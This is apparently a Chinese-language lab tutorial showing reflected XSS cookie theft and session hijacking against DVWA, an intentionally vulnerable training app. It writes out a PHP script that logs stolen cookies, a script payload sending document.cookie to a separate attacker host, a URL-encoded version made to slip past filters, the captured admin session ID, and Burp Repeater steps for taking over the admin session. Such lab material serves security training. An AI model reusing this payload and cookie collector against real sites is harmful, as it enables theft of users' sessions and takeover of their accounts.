页面中创建cookie变量,然后将cookie变量写入cookie.txt
# vim /var/www/html/diaoyu.php
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>
# touch cookie.txt
# chown www-data.www-data cookie.txt
# systemctl start apache2.service
1.1.2 构建URL
1.1.2.1 构建payload
<script>document.location='http://192.168.10.180/diaoyu.php?cookie='+document.cookie</script>
payload说明:
- location:用于跳转页面
- http://192.168.10.180/diaoyu.php'?cookie='+document.cookie:传递cookie参数到php
1.1.2.2 完整URL
http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.10.180/diaoyu.php?cookie='+document.cookie</script>
但是因为url中直接有"js脚本”,有时服务器会拒绝,导致访问不成功,所以我们使用burpsuite对payload进行URL加密:
替换后的URL是:
http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%38%30%2f%64%69%61%6f%79%75%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
注意:这个加密链接想直接访问必须提前登录DVWA,否则浏览器没有cookie信息会无法获取cookie。
1.1.3 在物理机上执行攻击
1.1.3.1 登录admin用户并修改安全级别
1.1.3.2 直接使用URL访问
访问后会自动跳转到钓鱼网站
┌──(root?kali)-[/var/www/html] └─# cat cookie.txt PHPSESSID=re1bikctb5qftocp0fqus1qos0; security=low
1.1.5.1 开启burpsuite拦截
1.1.5.2 使用普通用户登录DVWA
DVWA中内置了一些其他用户,这里我们使用用户名:smithy密码:password登录DVWA。
放行第一个请求,因为该请求携带用户名和密码:
将存在Cookie信息的请求发送到Repeater进行重放攻击,将现在的普通用户的cookie信息替换成前期抓到的admin cookie信息:PHPSESSID= re1bikctb5qftocp0fqus1qos0; security=low
点击Send返回状态码200表示成功。
1.1.5.4 浏览器查看提权成功
浏览器中访问:
成功切换为admin用户。
我的微信
如果有技术上的问题可以扫一扫我的微信
